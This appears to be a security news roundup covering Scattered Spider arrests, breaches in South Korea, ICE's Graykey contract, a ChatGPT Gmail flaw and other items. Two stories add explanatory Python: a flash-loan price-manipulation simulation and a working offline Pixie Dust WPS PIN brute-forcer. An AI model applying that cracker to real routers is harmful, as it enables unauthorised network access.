Two Scattered Spider members busted in the UK, one indicted in the US

MI6 launches dark web portal for potential spy comms, KT hit by another breach, Korean authorities vow sweeping response to hacking spree, ICE signs contract with Graykey phone hacking device maker, ChatGPT flaw that enabled Gmail extraction fixed, $2m theft roils BNB Chain DeFi scene, much more



Two teenagers, 18-year-old Owen Flowers from Walsall and 19-year-old Thalha Jubair from East London, believed to be linked to the August 2024 cyberattack on Transport for London, and suspected members of the Scattered Spider threat group, have been arrested in the United Kingdom.

Flowers was previously arrested for his alleged involvement in the TfL attack in September 2024, but was released on bail after being questioned by officers of the UK National Crime Agency.

Since then, NCA investigators have found additional evidence potentially linking Flowers to attacks against US healthcare companies.

The two suspects are being prosecuted for computer misuse and fraud-related charges linked to an investigation into the breach of London's public transportation agency. Additionally, Flowers faces charges for conspiring to attack the networks of SSM Health Care Corporation and Sutter Health in the United States.

The US Department of Justice also charged Thalha Jubair with conspiracies to commit computer fraud, money laundering, and wire fraud, in relation to at least 120 network breaches and extortion attacks worldwide between May 2022 and September 2025, which affected at least 47 US organizations.

The complaint, filed in the District of New Jersey, alleges that victims have paid Jubair and his accomplices at least $115,000,000 in ransom payments.

The NCA arrested four other suspected members of the Scattered Spider cybercrime collective in July, believed to be involved in cyberattacks targeting major retailers in the country, including Marks & Spencer, Harrods, and Co-op. (Sergiu Gatlan / Bleeping Computer)

Related: NCA, Justice Department, Financial Times, The Record, Ars Technica, BBC, The Register, The Verge, The Times, PCMag, Sky News, The Guardian, DeviceSecurity.io, TechCrunch, The Cyber Express, CyberScoop, Infosecurity, Hackread, TechRadar, Krebs on Security, Cyber Kendra, Digit

The UK’s foreign intelligence service, MI6, launched a new online portal, which it says will allow potential spies in Russia and elsewhere to send the agency messages securely over the dark web.

Outgoing MI6 chief Richard Moore is using a speech today to announce the portal, called Silent Courier, the Foreign Office said in a statement. The agency will also post instructions on its official YouTube channel to help recruits pass on information about hostile intelligence activity or terrorism.

“Today, we’re asking those with sensitive information on global instability, international terrorism, or hostile state intelligence activity to contact MI6 securely online,” Moore will say in a speech in Istanbul, according to the statement. “Our virtual door is open to you.”

The advice to those wanting to spy for Britain includes downloading the Tor Browser on a device not linked to them personally, and using a trustworthy virtual private network. (Alex Wickham / Bloomberg)

Related: Al Jazeera, The i Paper, Reuters, CNN, Associated Press, The Sun, Irish News, Telegraph, Sky News, Kyiv Independent, The Register, Euronews, Firstpost, The Record

Korean telecom provider KT said it has reported a new case of suspected data breaches to authorities for investigation, separate from its recent unauthorized micropayment incident.

South Korea's No. 2 mobile carrier said the report was submitted to the Korea Internet & Security Agency (KISA) just before midnight the previous day.

The mobile carrier said it had carried out an internal investigation for about four months and identified four cases with evidence of server breaches, along with two other suspected cases.

The report was submitted just hours after KT held a press briefing where the company raised the possible leakage of International Mobile Subscriber Identity (IMSI) and International Mobile Equipment Identity (IMEI) numbers, as well as phone numbers.

KT nevertheless maintained that the universal subscriber identity module (USIM) authentication key had not been compromised, although the newly reported server breaches mean the company cannot completely rule out the possibility. (Yonhap News Agency)

Related: Korea JoongAng Daily, BusinessKorea

South Korea’s Ministry of Science and ICT and the Financial Services Commission vowed a sweeping government response to a surge in high-profile cyberattacks that have rattled the nation’s telecommunications and financial sectors.

In a joint press briefing, Second Vice ICT Minister Ryu Je-myung stressed the gravity of the recent unauthorized micropayment scandal involving telecom giant KT Corp., pledging a rigorous probe and full disclosure of investigative findings.

“A joint public-private task force is urgently investigating how the attacker’s rogue micro base stations gained access to KT’s internal network and siphoned off personal data,” Ryu said.

The ministry confirmed that at least 362 individuals incurred damages totaling about 240 million won ($172,000), with up to 20,030 users exposed to unauthorized data harvesting. Compromised data includes mobile phone numbers, International Mobile Subscriber Identity (IMSI) numbers, and International Mobile Equipment Identity (IMEI) codes.

The vice minister also previewed major regulatory reforms: “Companies that intentionally delay or fail to report cyber intrusions will face significantly heavier penalties. The government will also be empowered to launch investigations based on circumstantial evidence, even in the absence of a formal corporate disclosure.”

In the same briefing, FSC Vice Chairman Kwon Dae-young revealed that a massive data breach at Lotte Card compromised the personal information of some 2.97 million customers. (Jie Ye-eun / Korea Herald)

Related: The Chosun Daily, Yonhap News Agency, The Investor

The US Immigration and Customs Enforcement (ICE) law enforcement arm, Homeland Security Investigations (HSI), has signed a contract worth $3 million with Magnet Forensics, a company that makes a phone-hacking and unlocking device called Graykey.

The contract, which appeared on Tuesday in a federal government procurement database, said it is for software licenses for the phone-hacking tech for HSI “to recover digital evidence, process multiple devices, & generate forensic reports essential to mission of protecting national security & public.”

While the contract doesn’t mention the name of the product, it’s likely referring to Graykey, a forensic system to unlock smartphones and extract data from them, which was initially developed by Grayshift. Magnet Forensics merged with Grayshift following an acquisition by private equity firm Thoma Bravo in 2023. (Lorenzo Franceschi-Bicchierai / TechCrunch)

Related: FPDS

Researchers at Radware report that OpenAI patched a ChatGPT security flaw that could have allowed hackers to extract Gmail data from its users.

The issue was found in ChatGPT’s Deep Research agent, a tool launched in February to help users analyze large troves of information. The vulnerability could have enabled attackers to siphon sensitive data from corporate or personal Gmail accounts, according to the findings. ChatGPT users who linked their Gmail accounts to the service may have unknowingly exposed their data to hackers, Radware researchers said.

The Deep Research tool from OpenAI is designed to conduct online research on users’ behalf more comprehensively and quickly answer complex questions. It can also connect to users’ Gmail accounts if they authorize it. Deep Research is available to ChatGPT users who pay an extra fee and marks an expansion of the company’s AI agents, or tools designed to carry out tasks with limited human intervention.

Radware uncovered the vulnerability, and researchers said there was no evidence that attackers had exploited it. OpenAI told Radware it fixed the flaw on September 3. (Margi Murphy / Bloomberg)

Related: Radware, Security Affairs, The Register, CSO Online, The Record, Ars Technica, Security Week

BNB Chain’s DeFi scene faced turbulence after attackers exploited the NGP protocol and siphoned off roughly $2 million in crypto, triggering a sharp token price drop and sending holders scrambling for information.

Security teams flagged the transactions almost immediately, but the attacker still converted the funds to ETH.

The stolen assets were bridged to Ethereum, then routed through Tornado Cash. Investigations are ongoing, with security firms warning other DeFi teams to review similar vulnerabilities.

Attackers used a flash loan to distort the reserves in the Uniswap V2 pair.

By skewing the pair's reserves with the borrowed funds, they temporarily distorted the spot price the contract derived from those reserves, so the USDT value the contract computed for the purchase fell under the maxBuyAmountInUsdt cap and the check passed.

Once past the buy limit, the exploiter bought large volumes of NGP tokens before restoring the pool to normal levels.

After repaying the flash loan, the attacker pocketed the profit in a single transaction. This attack vector is common in protocols that rely on a single DEX spot price without an oracle safeguard. (Brenda Mary / Blockonomi)
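As an added illustration (not code from the NGP contract or from any of the cited reports), the following Python simulation models a Uniswap V2-style constant-product pair and runs the same oversized buy against two versions of a USDT-denominated buy cap: one that prices the purchase from the pair's live reserves, and one that uses a price fixed outside the attacker's transaction (a TWAP or external oracle). The pool sizes, the 500 USDT cap, the function names, and the direction of the skew (flash-borrowed tokens dumped into the pair to depress the spot price) are assumptions chosen for the simulation, not details taken from the incident.

```python
from dataclasses import dataclass

FEE_NUM, FEE_DEN = 997, 1000  # Uniswap V2 charges 0.3% per swap
MAX_BUY_USDT = 500.0          # hypothetical value for the cap; the page only names the parameter


@dataclass
class Pair:
    """Constant-product pool (x * y = k) in the style of a Uniswap V2 pair. Constructed values."""
    usdt: float
    tok: float

    def spot_price(self) -> float:
        """USDT per token as read from the current reserves (what getReserves() exposes)."""
        return self.usdt / self.tok

    def sell_tok(self, amount_tok: float) -> float:
        """Swap tokens for USDT; returns USDT received. Pushes the spot price down."""
        out = self.usdt * amount_tok * FEE_NUM / (self.tok * FEE_DEN + amount_tok * FEE_NUM)
        self.tok += amount_tok
        self.usdt -= out
        return out

    def buy_tok(self, amount_usdt: float) -> float:
        """Swap USDT for tokens; returns tokens received. Pushes the spot price up."""
        out = self.tok * amount_usdt * FEE_NUM / (self.usdt * FEE_DEN + amount_usdt * FEE_NUM)
        self.usdt += amount_usdt
        self.tok -= out
        return out


def vulnerable_max_buy_check(pair: Pair, buy_tok: float) -> bool:
    """Values the purchase with the live reserves of a single DEX pair.
    Anything earlier in the same transaction can move those reserves first."""
    return buy_tok * pair.spot_price() <= MAX_BUY_USDT


def hardened_max_buy_check(reference_price: float, buy_tok: float) -> bool:
    """Values the purchase with a price fixed outside the caller's transaction,
    e.g. a TWAP built from the pair's cumulative prices or an external oracle."""
    return buy_tok * reference_price <= MAX_BUY_USDT


def simulate(buy_tok: float = 50_000.0, flash_loan_tok: float = 9_000_000.0) -> dict:
    """Run the same oversized buy against both checks, before and after the attacker
    skews the pool with flash-borrowed tokens. All pool numbers are constructed."""
    pair = Pair(usdt=100_000.0, tok=1_000_000.0)  # 0.10 USDT per token
    reference_price = pair.spot_price()           # snapshot a TWAP/oracle would report

    before = {
        "vulnerable": vulnerable_max_buy_check(pair, buy_tok),
        "hardened": hardened_max_buy_check(reference_price, buy_tok),
    }

    # Step 1 of the attacker's transaction: dump flash-borrowed tokens into the pair.
    # Token reserve balloons, USDT reserve drains, the reserve-derived price collapses.
    usdt_received = pair.sell_tok(flash_loan_tok)

    # Step 2: the buy the contract is supposed to cap is now valued at the skewed price.
    after = {
        "vulnerable": vulnerable_max_buy_check(pair, buy_tok),
        "hardened": hardened_max_buy_check(reference_price, buy_tok),
    }
    skewed_price = pair.spot_price()

    # Step 3: swap the USDT back to recover tokens and repay the loan. The 0.3% fees
    # are the only cost of the manipulation itself; the exploit's profit came from
    # whatever the bypassed cap was protecting, which this simulation does not model.
    tokens_recovered = pair.buy_tok(usdt_received)

    return {
        "reference_price": reference_price,
        "skewed_price": skewed_price,
        "before": before,
        "after": after,
        "loan_shortfall_tok": flash_loan_tok - tokens_recovered,
    }


if __name__ == "__main__":
    r = simulate()
    print(f"fair price {r['reference_price']:.4f}, skewed price {r['skewed_price']:.6f}")
    print("before manipulation:", r["before"])
    print("after manipulation: ", r["after"])
    print(f"manipulation cost: {r['loan_shortfall_tok']:.0f} tokens in fees")
```

The reserve-based check is not wrong about the pool; it is wrong about what the pool proves. Reserves at the moment of the call are a value the caller controls, so any limit denominated in them can be tuned to pass. A TWAP or an oracle that the transaction cannot move within the same block is the usual safeguard the article refers to.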

Related: The Crypto Times, The Block, Coinspeaker

In a Pixie Dust attack, an attacker within range of the targeted Wi-Fi network captures the first messages of a WPS registration exchange; the hashes the device sends in them can then be cracked offline to recover the WPS PIN. The attack leverages the fact that on some devices the secret nonces mixed into those hashes are generated using predictable or low-entropy methods.

The attacker needs only seconds to capture the exchange, and the PIN can then be obtained offline within minutes or even seconds.
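The offline step, as an added example that is neither NetRise's tooling nor code from any existing Pixie Dust implementation: the Python below recomputes the enrollee hashes from the WPS registration protocol (PSK1 and PSK2 from the two PIN halves, E-Hash1 and E-Hash2 from the secret nonces E-S1/E-S2, the PSKs and the Diffie-Hellman public keys) and then recovers the PIN by brute force once E-S1/E-S2 are guessable. AuthKey, PKE and PKR are constructed stand-ins for the session values the attacker captures; the weak-nonce case assumes all-zero E-S1/E-S2, one of the behaviours the original Pixie Dust research reported, and the strong-nonce case shows the same search failing.

```python
import hashlib
import hmac
import secrets
from typing import Optional, Tuple

# Constructed stand-ins for the live session values. In a real exchange AuthKey is
# derived from the Diffie-Hellman secret plus the nonces, and PKE/PKR are the
# 192-byte DH public keys carried in M1 and M2; the attacker observes all of these.
AUTH_KEY = hashlib.sha256(b"constructed AuthKey").digest()
PKE = hashlib.sha256(b"constructed PKE").digest() * 6   # 192 bytes
PKR = hashlib.sha256(b"constructed PKR").digest() * 6   # 192 bytes
ZERO_NONCE = bytes(16)  # assumed weak E-S1/E-S2 value: all zeros


def wps_checksum_digit(first7: int) -> int:
    """Checksum that turns a 7-digit PIN body into a valid 8-digit WPS PIN
    (same weighting as hostapd's wps_pin_checksum)."""
    accum = 0
    while first7:
        accum += 3 * (first7 % 10)
        first7 //= 10
        accum += first7 % 10
        first7 //= 10
    return (10 - accum % 10) % 10


def psk_half(pin_half: str) -> bytes:
    """PSK1/PSK2: first 128 bits of HMAC-SHA256(AuthKey, four ASCII PIN digits)."""
    return hmac.new(AUTH_KEY, pin_half.encode(), hashlib.sha256).digest()[:16]


def e_hash(e_s: bytes, psk: bytes) -> bytes:
    """E-Hash1/E-Hash2 = HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR)."""
    return hmac.new(AUTH_KEY, e_s + psk + PKE + PKR, hashlib.sha256).digest()


def enrollee_m3(pin: str, es1: bytes, es2: bytes) -> Tuple[bytes, bytes]:
    """What the enrollee (the router/AP) sends in M3; E-S1/E-S2 are meant to stay secret."""
    return e_hash(es1, psk_half(pin[:4])), e_hash(es2, psk_half(pin[4:]))


def pixie_dust(e_hash1: bytes, e_hash2: bytes, es1: bytes, es2: bytes) -> Optional[str]:
    """Offline PIN recovery from the captured hashes and guessed nonces.
    First half: 10^4 candidates. Second half: 10^3, because digit 8 is a checksum."""
    first = None
    for i in range(10_000):
        half = f"{i:04d}"
        if hmac.compare_digest(e_hash(es1, psk_half(half)), e_hash1):
            first = half
            break
    if first is None:
        return None  # nonce guess was wrong: the search space is really 2^128
    for j in range(1_000):
        body = int(first) * 1_000 + j
        half = f"{j:03d}{wps_checksum_digit(body)}"
        if hmac.compare_digest(e_hash(es2, psk_half(half)), e_hash2):
            return first + half
    return None


def recover_demo(pin: str = "12345670", weak_nonces: bool = True) -> Optional[str]:
    """Simulate one enrollee and attack it with the all-zero nonce guess.
    12345670 is a valid example PIN (its checksum digit is 0)."""
    if weak_nonces:
        es1 = es2 = ZERO_NONCE
    else:
        es1, es2 = secrets.token_bytes(16), secrets.token_bytes(16)  # properly random
    h1, h2 = enrollee_m3(pin, es1, es2)
    return pixie_dust(h1, h2, ZERO_NONCE, ZERO_NONCE)


if __name__ == "__main__":
    print("weak nonces   ->", recover_demo())
    print("random nonces ->", recover_demo(weak_nonces=False))
```

Note why the PIN falls so fast: the protocol commits to each PIN half separately, and the last digit is a checksum, so a known E-S1/E-S2 reduces the whole problem to 11,000 HMAC evaluations. A properly random 128-bit nonce makes the same search infeasible, which is why the fix is in the device's random number generation rather than in the PIN.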

NetRise has analyzed 24 networking device models used today to see if they are still vulnerable to Pixie Dust attacks. The devices came from six vendors, but TP-Link made half of them. 

NetRise's analysis showed that of the 24 routers, access points, range extenders, and powerline/Wi-Fi hybrid systems, only four have been patched against Pixie Dust attacks, and in several of those cases the fix arrived nine to ten years after the attack was published. Of the 20 unpatched products, seven have reached end of life, but 13 are still supported.

In the tests conducted by the security firm, the WPS PIN was recovered in 1-2 seconds.

With twenty popular device models found vulnerable to Pixie Dust attacks, that could translate to millions of affected devices. (Eduard Kovacs / Security Week)

Related: NetRise, SC Media, Help Net Security, Industrial Cyber

Timeline of the Pixie Dust hack. Source: NetRise.

According to a court record, Dale Britt Bendler, a long-serving CIA officer who retired in 2014 and rejoined the agency as a contractor, used his access to classified CIA systems as "his own personal Google," digging through them for information he then sold to a US lobbying firm and foreign clients.

“In total, between July 2017 and September 2020, Defendant earned approximately $360,000 in private client fees while also working as a full-time CIA contractor with daily access to highly classified material that he searched like it was his own personal Google,” a court document says. “He violated his oaths, broke the law, and should be held accountable.”

In his contractor role, Bendler had a Top Secret/Sensitive Compartmented Information security clearance, which granted access to some of the most sensitive information in the US government. In 2017, Bendler started working for a foreign national who was being investigated by his home country for allegedly embezzling money from the country’s sovereign wealth fund, according to the court record.

Bendler was paid $20,000 a month to help mount a public relations campaign that could rebut those embezzlement allegations and lobby government officials, it adds. The document says Bendler searched classified US government systems to see what information they contained about the foreign national.

In a second case, the foreign national had been accused of laundering money for a foreign terrorist organization. Bendler then searched CIA systems for information related to this person, according to the court record. (Joseph Cox / 404 Media)

Related: All-Source Intelligence

The Trump administration issued a lengthier denial of a whistleblower's allegation that DOGE officials at the Social Security Administration (SSA) copied the agency's database to an insecure cloud system.

The allegation centers on the Numerical Identification System (NUMIDENT) database containing Americans' personally identifiable information.

The cloud location described by the whistleblower report "is actually a secured server in the agency's cloud infrastructure, which historically has housed this data and is continuously monitored and overseen—SSA's standard practice," said a letter sent yesterday to Senate Finance Committee Chairman Mike Crapo (R-Idaho).

SSA Commissioner Frank Bisignano, a Trump appointee who was previously CEO of the financial technology company Fiserv, sent the letter. It came in response to Crapo's request for information.

"I can confirm, based on the agency's thorough review, that neither the Numident database nor any of its data has been accessed, leaked, hacked, or shared in any unauthorized fashion," Bisignano wrote. "SSA continuously monitors its systems for any signs of unauthorized access or data compromise, and we have not detected any such incidents involving the Numident database."

However, Bisignano's response ignores the whistleblower's primary complaint, which is that DOGE never obtained the authorization to operate that FISMA mandates. That process would have required several rigorous security steps and review by experts, and can take six months or more. (Jon Brodkin / Ars Technica)

Related: Fedscoop, Meritalk, Senate Finance Committee

Best Thing of the Day: Making Big Guys Pay

Aria Salvatrice, a self-described multimedia "autist" from France who is fighting the "creepy uncle" surveillance problem of open source software, has launched what she calls the Forklift Certified License, version 0.69.420, which gives the little guys the right to use the software while the big guys must pay.

Worst Thing of the Day: UK Workers Pay the Price for a Cyberattack

Around 230,000 workers remain out of work in the UK as the cyberattack on Jaguar Land Rover drags on far longer than expected.

Bonus Worst Thing of the Day: This Is One Way to Force Folks to Stay Away From the Fridge

A software update rolling out to Samsung’s Family Hub refrigerators in the US is putting ads on the fridges for the first time.
